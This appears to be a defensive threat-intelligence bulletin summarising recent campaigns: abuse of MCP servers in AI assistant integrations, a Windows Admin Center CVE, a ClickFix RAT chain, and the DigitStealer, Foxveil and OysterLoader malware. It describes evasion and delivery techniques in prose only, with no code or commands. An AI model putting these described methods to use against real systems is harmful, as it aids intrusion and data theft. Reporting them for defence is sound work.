Threat Alerts

A growing trend has emerged involving the active exploitation of Model Context Protocol (MCP) servers, introduced by Anthropic to standardize AI assistant integrations with external tools and platforms. Threat actors are increasingly abusing MCP’s intermediary architecture to enable arbitrary code execution, data exfiltration, and context manipulation, including cases where malicious MCP servers harvested sensitive emails and triggered unintended system commands through legitimate integrations. The dynamic installation of MCP packages further expands the attack surface, introducing supply-chain risk via compromised or typosquatted repositories, positioning MCP-enabled AI environments as an escalating target for sophisticated threat activity.

Microsoft has disclosed a critical security vulnerability in Windows Admin Center that enables privilege escalation attacks in enterprise environments. CVE-2026-26119 (CVSS Score 8.8) affects the authentication mechanisms of this web-based management platform used to administer Windows systems, servers, and infrastructure components.

The vulnerability stems from insufficient authentication controls within Windows Admin Center’s web interface, allowing attackers to gain elevated privileges equivalent to users running the application. Despite the formal CVSS rating of 8.8, Microsoft internally classifies this flaw as critical due to the likelihood of exploitation and potential impact on administrative environments. The vulnerability particularly threatens organizations where Windows Admin Center operates with elevated privileges, potentially compromising infrastructure integrity and data security across managed systems.

A recent investigation uncovered an active ClickFix campaign leveraging compromised legitimate websites to deliver a sophisticated multi-stage malware chain that culminates in deployment of a custom remote access trojan (RAT). The operation spans multiple industries and geographies, using hijacked web infrastructure as delivery nodes and communicating over HTTPS with HTTP profiles crafted to resemble legitimate web analytics traffic. The final implant supports advanced post-exploitation capabilities, including token impersonation, SOCKS5 tunneling and execution of 22 distinct commands, reflecting a mature and operationally capable threat actor.

The infection chain begins with malicious JavaScript injected into legitimate websites, including a Bank Identification Number validation service, which loads external scripts from another compromised site, a legitimate fund platform. Victims are presented with a fake Cloudflare verification page that silently copies a malicious PowerShell command to the clipboard and instructs execution, bypassing browser download protections. Execution triggers a five-stage sequence: an obfuscated PowerShell downloader retrieves a second-stage script that disables Event Tracing for Windows and antivirus scanning via reflection-based patching, then deploys a Lua-based loader. The Lua component decrypts and executes embedded shellcode entirely in memory, implementing a custom decoder for fully fileless execution.

The final payload, a native x64 executable, employs HTTP C2 profiles and operates across two infrastructure clusters – one for delivery and one for post-exploitation. The RAT provides process control, file management, interactive shell access, token manipulation, shellcode injection and SOCKS proxy tunneling.

A macOS-focused infostealer known as DigitStealer has exposed substantial portions of its command-and-control infrastructure, offering defenders valuable insight into its operational footprint. The malware specifically targets Apple Silicon systems—particularly M2-class devices—and is designed to extract data from 18 cryptocurrency wallets, browser stores, and macOS Keychain entries. Unlike typical malware-as-a-service operations, DigitStealer appears to function as a closed campaign without a public affiliate panel, suggesting control by a single operator or tightly coordinated group.

DigitStealer is delivered through trojanized macOS applications packaged as deceptive disk images impersonating legitimate productivity tools. Once executed, it deploys a multi-stage payload chain, establishes persistence via a Launch Agent, and polls its C2 server every 10 seconds for AppleScript or JavaScript tasking, effectively operating as a persistent backdoor. Network communications are segmented across four endpoints handling credential theft, file exfiltration, tasking, and telemetry, with a cryptographic challenge-response mechanism gating command execution. The malware transmits the system’s hardware UUID hashed with MD5, creating a consistent detection artifact. Infrastructure analysis reveals tightly clustered .com domains hosted on a single Swedish provider, terminating HTTPS via nginx with Let’s Encrypt certificates, adjacent IP allocations, recurring SSH banners, common registrar and nameserver usage, and batch domain registrations spanning mid-2025 to early 2026. The uniform deployment patterns and centralized hosting strongly indicate a single-actor operation rather than a distributed affiliate ecosystem.

A newly discovered malware loader called “Foxveil” has been actively targeting systems using legitimate cloud platforms like Cloudflare, Netlify, and Discord to evade detection. This sophisticated threat represents a concerning evolution in how attackers abuse trusted infrastructure to hide malicious operations and bypass traditional security measures.

Foxveil operates through two distinct variants that contact staging locations on legitimate cloud services to retrieve shellcode payloads. The first variant uses process injection techniques by spawning fake system processes and injecting malicious code, while the second variant performs self-injection within the same process context. Both versions establish persistence by registering as Windows services or dropping executables into system directories with names mimicking legitimate processes. The malware includes a unique string-mutation mechanism that rewrites common analysis keywords during runtime, making static detection significantly more challenging for security tools.

After establishing initial access, Foxveil downloads additional executables from cloud domains and places them strategically in system directories to maintain long-term access. The malware’s ability to blend into regular enterprise network traffic through legitimate services, combined with its runtime obfuscation capabilities, makes it particularly difficult for traditional signature-based detection systems to identify.

OysterLoader, a sophisticated C++ malware loader also known as Broomstick or CleanUp, has emerged as a critical threat in the cybersecurity landscape. Primarily linked to the Rhysida ransomware group and WIZARD SPIDER threat actors, this multi-stage loader employs advanced evasion techniques to deliver ransomware and commodity malware like Vidar infostealer.

The malware operates through a complex four-stage infection chain beginning with trojanized MSI installers disguised as legitimate software like PuTTY, WinSCP, and Google Authenticator. The first stage employs API flooding with hundreds of useless Windows function calls to confuse security tools, while implementing anti-debugging traps and custom dynamic API resolution using hashing algorithms. Stage two utilizes a modified LZMA compression algorithm with custom headers that prevent standard decompression tools from analyzing the payload. The third stage performs environment verification, checking for at least 60 running processes before establishing HTTPS communication with delivery servers.

The final stage demonstrates advanced steganographic techniques by hiding encrypted payloads within icon image files using RC4 encryption with hardcoded keys. Communication occurs through a dual-layer C2 infrastructure utilizing custom JSON encoding with non-standard Base64 alphabets and random shift values for each message. The malware maintains persistence through scheduled tasks running every 13 minutes and continuously evolves its communication protocols, with recent variants hosting /api/v2/facade endpoints.